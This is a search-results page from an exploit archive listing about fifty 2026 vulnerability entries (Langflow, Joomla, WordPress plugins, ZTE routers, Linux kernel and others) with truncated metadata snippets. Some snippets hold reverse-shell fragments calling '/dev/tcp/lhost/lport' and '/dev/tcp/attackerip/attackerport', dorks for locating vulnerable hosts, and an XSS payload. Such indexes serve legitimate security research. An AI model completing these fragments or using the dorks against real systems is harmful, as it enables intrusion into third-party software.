47904 matches found
Langflow 1.9.0 - RCE
Exploit Title: Langflow 1.9.0 - RCE Exploit Author: Diamorphine Vendor Homepage: https://www.langflow.org/ Software Link: https://www.langflow.org/desktop Version: & /dev/tcp/lhost/lport 0&1'"\n\nfrom lfx.custom.customcomponent.component import Component\nfrom lfx.io import Output\nfrom...
Joomla Page Builder CK 3.5.10 - Arbitrary File Upload
Exploit Title: Joomla Page Builder CK 3.5.10 - Arbitrary File Upload Google Dork: inurl:compagebuilderck OR "/components/compagebuilderck/assets/pagebuilderck.js" Date: 2026-07-04 Exploit Author: M@rAz Ali Credits: Peyman Siyahi, MR.PERSIA Vendor Homepage: https://www.joomlack.fr/ Software Link:...
Atarim WordPress Plugin 4.2.2 - Sensitive Information Exposure
Exploit Title: Atarim WordPress Plugin 4.2.2 - Sensitive Information Exposure Google Dork: N/A Date: 2026-07-05 Exploit Author: Mohammad Hossein Sadeghian Vendor Homepage: https://atarim.io/ Software Link: https://wordpress.org/plugins/atarim/ Version: 4.2.2 Tested on: Ubuntu 22.04 LTS, Apache 2....
Krayin CRM v2.2.x - Authenticated Remote Code Execution
Exploit Title: Krayin CRM v2.2.x - Authenticated Remote Code Execution Date: 07/05/2026 Exploit Author: Diamorphine Vendor Homepage: https://krayincrm.com Software Link: https://github.com/krayin/laravel-crm Version: 2.2.x Tested on: Debian CVE : CVE-2026-38526 import asyncio import httpx from...
Tenable Nessus 10.12.1 - SQL Injection
Exploit Title: Tenable Nessus 10.12.1 - SQL Injection CVE: CVE-2026-57588 Date: 2026-06-26 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Author GitHub: https://github.com/mbanyamer Author Blog : https://banyamersecurity.com/blog/ Vendor Homepage:...
Flowise 3.1.3 - arbitrary code execution
Exploit Title: Flowise 3.1.3 - arbitrary code execution CVE: CVE-2026-58057 Date: 2026-06-29 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Author GitHub: https://github.com/mbanyamer Author Blog : https://banyamersecurity.com/blog/ Vendor Homepage:...
ProtonVPN v4.4.1 - Unquoted Service Path
Exploit Title: ProtonVPN v4.4.1 - Unquoted Service Path Date: 2026-06-22 Exploit Author: Milad Karimi Contact: [email protected] Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL Vendor Homepage: https://protonvpn.com/ Software Link: https://protonvpn.com/ Version: 4.4.1 Tested on: Windo...
WordPress Bricks Builder Theme - RCE
Exploit Title: WordPress Bricks Builder Theme - RCE Date: 2026-06-25 Exploit Author: Jared Brits K3ysTr0K3R Vendor Homepage: https://bricksbuilder.io/ Software Link: https://bricksbuilder.io/ Version: Bricks Builder = 1.9.6 Tested On: Kali Linux 2026.1 / WordPress 6.7 CVE: CVE-2024-25600...
MCPJam Inspector - Remote Code Execution
Exploit Title: MCPJam Inspector - Remote Code Execution Date: 07/03/2026 Exploit Author: Diamorphine Vendor Homepage: https://www.mcpjam.com/ Software Link: https://github.com/MCPJam Version: & /dev/tcp/attackerip/attackerport 0&1", "env": , "serverId": "Hello666" readyurl = urljoinurl,...
Hydra - Stack Buffer Overflow
Exploit Title: Hydra - Stack Buffer Overflow CVE: CVE-2026-56766 Date: 2026-06-26 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Author GitHub: https://github.com/mbanyamer Author Blog : https://banyamersecurity.com/blog/ Vendor Homepage:...
iOS Bluetooth PAN Exploit - Ethernet Gateway without Adapter
Exploit Title: iOS Bluetooth PAN - Zero-Cost Ethernet Gateway USB Port 62078 Date: 2026-06-23 Exploit Author: Fares Dahoumane Silent Killer Vendor Homepage: https://www.apple.com/ Software Link: https://www.apple.com/ios/ Version: iOS 17 and later Tested on: iPhone 14 Pro iOS 17.5.1, macOS Ventur...
Discuz! X5.0 - Authentication Bypass
Exploit Title: Discuz! X5.0 - Authentication Bypass CVE: CVE-2026-49952 Date: 2026-06-26 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Author GitHub: https://github.com/mbanyamer Author Blog : https://banyamersecurity.com/blog/ Vendor Homepage:...
KNX visualisering - Broken Access Control
Exploit Title: KNX visualisering - Broken Access Control Date: 6/10/2026 Exploit Author: parsa rezaie khiabanloo Vendor Homepage: KNX visualisering https:/www.knxgroep.nl Version: KNX visualisering Tested on: Windows/Linux Step 1 : Attacker can using these dorks then can find the KNX panel . Shod...
Windows Defender (MsMpEng.exe) - Race Condition
Titles: Windows Defender MsMpEng.exe - Race Condition Author: nu11secur1ty Date: 2026-06-11 Vendor: Microsoft Corporation Software: Windows Defender Antivirus MsMpEng.exe Reference: https://gitlab.com/nu11secur1ty/0/-/raw/main/README.md?reftype=heads Description: A race condition exists between...
MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation
Exploit Title: MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation Google Dork: N/A Date: 2026-06-16 Exploit Author: Mohammad Vendor Homepage: https://www.memuplay.com Software Link: https://www.memuplay.com/download.html Version: 9.2.7.0 Tested on: Windows 10 x64 / Windows 11 x64 CVE:...
WordPress Plugin WPZOOM Portfolio 1.4.21 - Reflected Cross-Site Scripting (XSS)
Exploit Title: WordPress Plugin WPZOOM Portfolio 1.4.21 - Reflected Cross-Site Scripting XSS Date: June 10, 2026 Exploit Author: Kent Apostol Vendor Homepage: https://wpzoom.com Software Link: https://wordpress.org Version: , , without any context-aware output escaping like escattr. Because...
KeepInMind 0.8.4.2 - Stored XSS
Exploit Title: KeepInMind 0.8.4.2 - Stored XSS Date: 2026-06-12 Exploit Author: Pavan N Vendor Homepage: https://wordpress.org/plugins/keepinmind-dashboard-notes/ Software Link: https://downloads.wordpress.org/plugin/keepinmind-dashboard-notes.0.8.4.3.zip Version: Session Expired. Please log in...
Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass Google Dork: N/A Date: 2026-06-19 Exploit Author: Onur BILICI @basekill Vendor Homepage: https://github.com/enesgkky/pulpy Software Link: https://github.com/enesgkky/pulpy Version: /Library/" or critical configuration directories like...
Joomla Extension 4.1.4 - PHP Object injection
Exploit Ttile: Joomla Extension 4.1.4 - PHP Object injection Affected : JoomShaper SP LMS = 4.1.4 Author : Amin İsayev / Proxima Cyber Security Joomla version note: RCE requires Joomla = 5.2.2 patched FormattedtextLogger.wakeup which blocks the gadget chain — PHP Object Injection still exists in...
OpenEMR 7.0.2 - Arbitrary File Read
Exploit Title: OpenEMR 7.0.2 - Arbitrary File Read Google Dork: intitle:"OpenEMR" inurl:"interface/login/login.php" Date: 2026-06-06 Exploit Author: doany1 Vendor Homepage: https://www.open-emr.org/ Software Link:...
WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection Google Dork: N/A Date: 2026-06-02 Exploit Author: cardosource Vendor Homepage: https://contest-gallery.com/ Software Link: https://wordpress.org/plugins/contest-gallery/ Version: getrow without proper...
WordPress OrderConvo 14 - Path Traversal
Exploit Title: WordPress OrderConvo 14 - Path Traversal Date: 05-31-2026 Exploit Author: Diamorphine Vendor Homepage: https://www.najeebmedia.com/ Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/ Version: 13.5 Tested on: Debian CVE : CVE-2025-1016...
Drupal Core 10.5.5 - Error-Based SQL Injection
Exploit Title: Drupal Core 10.5.5 - Error-Based SQL Injection Google Dork: N/A Date: 2026-05-31 Exploit Author: cardosource Vendor Homepage: https://www.drupal.org Software Link: https://www.drupal.org/project/drupal Version: Drupal Core 10.5.5 Tested on: Debian Linux Docker, PHP 8.2, Apache,...
YAMCS yamcs-core 5.12.7 - LDAP Injection
Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https://yamcs.org Software Link: https://github.com/yamcs/yamcs Version: 1 else "http://localhost:8090" base = target.rstrip"/" print"=" 65 print"...
YAMCS yamcs-core 5.12.7 - User Enumeration
Exploit Title: YAMCS yamcs-core 1 else "http://localhost:8090" username = sys.argv2 if lensys.argv 2 else "testuser" password = sys.argv3 if lensys.argv 3 else "test" base = target.rstrip"/" print"=" 65 print" CVE-2026-44595 — YAMCS IAM User Enumeration PoC" printf" Target: target" printf"...
YAMCS yamcs-core 5.12.7 - No Rate Limiting
Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https://yamcs.org Software Link: https://github.com/yamcs/yamcs Version: 5.12.7 Tested on: Linux CVE: CVE-2026-44596 Category: Remote / Brute Force...
Notepad++ 8.9.6 - Arbitrary Code Execution
Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution Date: 2026-05-30 Exploit Author: Kavin Jindal Avyukt Security https://www.linkedin.com/in/kavin-jindal/ Vendor Homepage: https://notepad-plus-plus.org Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/ Version: from config.xml...
Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution
Exploit Title: Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution Google Dork: N/A Date: 2026-05-22 Exploit Author: cardosource Vendor Homepage: https://quickplayground.com Software Link: https://downloads.wordpress.org/plugin/quick-playground.1.3.1.zip Version: \ wp...
MikroORM 7.0.13 - SQL Injection
Exploit Title: MikroORM 7.0.13 - SQL Injection Google Dork: N/A Date: 2026-05-27 Exploit Author: cardosource Vendor Homepage: https://mikro-orm.io/ Software Link: https://github.com/mikro-orm/mikro-orm Version: @mikro-orm/knex = 6.6.13 / @mikro-orm/sql = 7.0.13 Tested on: Docker / Debian Bookworm...
ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion
Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion Google Dork: N/A Date: 2026-05-13 Exploit Author: Jose Rivas bl4cksku11 & Zero Trust Offsec Vendor Homepage: https://imagemagick.org/ Software Link: https://imagemagick.org/download/ Version: ImageMagick 7.x...
strongSwan 5.9.13 - DoS
Exploit Title: strongSwan 5.9.13 - DoS Date: 2026-05-13 Exploit Author: Lukas Johannes Moeller Vendor Homepage: https://www.strongswan.org/ Software Link: https://download.strongswan.org/strongswan-5.9.13.tar.bz2 Version: strongSwan next never advances and the per-attribute length computation...
CubeCart < 6.7.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
Exploit Title: CubeCart alert"Test!" 3- Press Enter. 4- Observe the alert box popping up on the screen, confirming the XSS execution. Alternative Direct Link: https://TARGET/cubecart/search?searchkeywords=SAMSUNG%20alert"Test!"&a=category Important Note for Reproduction For the payload to execute...
MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution
Exploit Title: MixPHP Framework 2.2.17 - Unsafe Deserialization Remote Code Execution Date: 2026-05-14 Exploit Author: cardosource Vendor Homepage: https://github.com/mix-php/mix Software Link: https://github.com/mix-php/mix Version: 2.x through 2.2.17 Tested on: Ubuntu 26.04 LTS / PHP 8.3.6 CVE:...
ZTE ZXHN H188A V6 - Authentication Bypass
Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass Date: 2026-05-20 Exploit Author: Mina Nageh Salalma Monx Research Vendor Homepage: https://www.zte.com.cn Software Link: https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router Version: ZXHN H188A V6.0.10P2TE,...
Prodigy Commerce 3.3.0 - Local File Inclusion
Exploit Title: Prodigy Commerce 3.3.0 - Local File Inclusion Date: 23-05-2026 Exploit Author: Diamorphine Vendor Homepage: https://prodigycommerce.com/ Software Link: https://wordpress.org/plugins/prodigy-commerce/ Version: 3.2.9 Tested on: Debian CVE : CVE-2026-0926 Description: Prodigy Commerce...
strongSwan 5.9.13 - libsimaka EAP-SIM/AKA heap buffer overflow
Exploit Title: strongSwan 5.9.13 - heap buffer overflow Date: 2026-05-13 Exploit Author: Lukas Johannes Moeller Vendor Homepage: https://www.strongswan.org/ Software Link: https://download.strongswan.org/strongswan-5.9.13.tar.bz2 Version: strongSwan length 4 - 4 without guarding against hdr-lengt...
ZTE Routers - Unauthenticated Denial of Service
Exploit Title: ZTE Routers - Unauthenticated Denial of Service Date: 2026-05-20 Exploit Author: Mina Nageh Salalma Monx Research Vendor Homepage: https://www.zte.com.cn Software Link: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers Version: Multiple ZTE router...
Microsoft - NTLMv2 Hash Capture
Titles: Microsoft - NTLMv2 Hash Capture Author: nu11secur1ty Date: 2026-05-27 Vendor: Microsoft Software: Windows Shell File Explorer Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202 Description: A spoofing vulnerability in Windows Shell File Explorer allows an attacker to capture NTLMv...
Langflow 1.3.0 - Remote Code Execution
Exploit Title: Langflow 1.3.0 - Remote Code Execution Fofa-dork: title="Langflow" Shodan-dork: title:"Langflow" Date: 23-05-2026 Exploit Author: Diamorphine Venodor Homepage: https://www.langflow.org/ Software Link: https://github.com/langflow-ai/langflow Version: 1.2.0 Tested on: Debian CVE :...
Wing FTP Server 8.1.3 - Authenticated Remote Code Execution
Exploit Title: Wing FTP Server 8.1.3 - Authenticated Remote Code Execution Date: 12.05.2026 Exploit Author: Ünsal Furkan Harani Vendor Homepage: https://www.wftpserver.com/ Software Link: https://www.wftpserver.com/download.htm Version: v8.1.2 Tested on: Wing FTP Server = 8.1.2, fixed in 8.1.3 CV...
ZTE H298A / H108N - Unauthenticated Credential Exposure
Exploit Title: ZTE H298A / H108N - Unauthenticated Credential Exposure via ETHCheat Parameter Date: 2026-05-20 Exploit Author: Mina Nageh Salalma Monx Research Vendor Homepage: https://www.zte.com.cn Software Link:...
Linux Kernel - Local Privilege Escalation
Titles: Linux Kernel Local Privilege Escalation CVE-2026-43284 / CVE-2026-43500 / CVE-2026-46300 Author: nu11secur1ty Date: 2026-05-11 Vendor: Linux Kernel Software: Linux Kernel All major distributions Vulnerability Type: Page-Cache Write / Memory Corruption Status: HIGH / CRITICAL --- Descripti...
EspoCRM 9.3.3 - SSRF
Exploit Title: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation Google Dork: N/A Date: 2026-05-08 Exploit Author: Max Gabriel https://github.com/EntroVyx Vendor Homepage: https://www.espocrm.com/ Software Link: https://github.com/espocrm/espocrm/releases/tag/9.3.3 Version: 9.3.3...
Realtek rtl819x - Local Privilege
Exploit Title: Realtek rtl819x - Local Privilege Escalation Date: 2026-05-03 Exploit Author: Daniil Gordeev Vendor Homepage: http://www.realtek.com Software Link: https://github.com/iptime-gpl/userappsn104qi representative GPL release Version: Realtek rtl819x Jungle SDK, all known versions throug...
scramble - Remote Code Execution
Exploit Title: scramble - Remote Code Execution Google Dork: inurl:/docs/api.json "dedoc/scramble" Date: 2026-05-07 Exploit Author: Joshua van der Poll https://github.com/joshuavanderpoll Vendor Homepage: https://scramble.dedoc.co Software Link: https://github.com/dedoc/scramble Version: =0.13.2,...
Casdoor 3.54.1 - Arbitrary File Write via Path Traversal
Exploit Title: Casdoor 3.54.1 - Arbitrary File Write via Path Traversal Date: 2026-05-11 Exploit Author: sixpain Vendor Homepage: https://casdoor.org/ Software Link: https://github.com/casdoor/casdoor Version: 3.54.1 Tested on: Linux / Docker CVE : CVE-2026-6815 """ Casdoor Arbitrary File Write /...
Linux Kernel - Local Privilege Escalation
Titles: Linux Kernel Local Privilege Escalation CVE-2026-43284 / CVE-2026-43500 Author: nu11secur1ty Date: 2026-05-11 Vendor: Linux Kernel Software: Linux Kernel All major distributions Vulnerability Type: Page-Cache Write / Memory Corruption Status: HIGH / CRITICAL --- Description The "Kukurigu"...
MeiG Smart FORGE_SLT711 - OS Command Injection
Exploit Title: MeiG Smart FORGESLT711 - OS Command Injection Date: 2026-05-03 Exploit Author: Daniil Gordeev Vendor Homepage: http://www.meigsmart.com Software Link: N/A firmware distributed via carrier channels Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 likely all firmware versions of thi...
OpenCATS 0.9.7.4 - SQL Injection
Exploit Title: OpenCATS 0.9.7.4 - SQL Injection Exploit Author: Gabriel Rodrigues TEXUGO from HAKAI Vendor Homepage: https://www.opencats.org Software Link: https://github.com/opencats/OpenCATS Version: 1 else "http://localhost:8888" user = sys.argv2 if lensys.argv 2 else "admin" pw = sys.argv3 i...
cPanel - CRLF Injection
ExploitTitle: cPanel 11.40 - CRLF Injection Author: nu11secur1tyAI Date: 2026-04-30 Vendor: cPanel, L.L.C. Software: cPanel & WHM cpsrvd Reference: CVE-2026-41940 / watchTowr-2026-01 Description: A critical authentication bypass vulnerability exists in the cPanel/WHM cpsrvd daemon due to improper...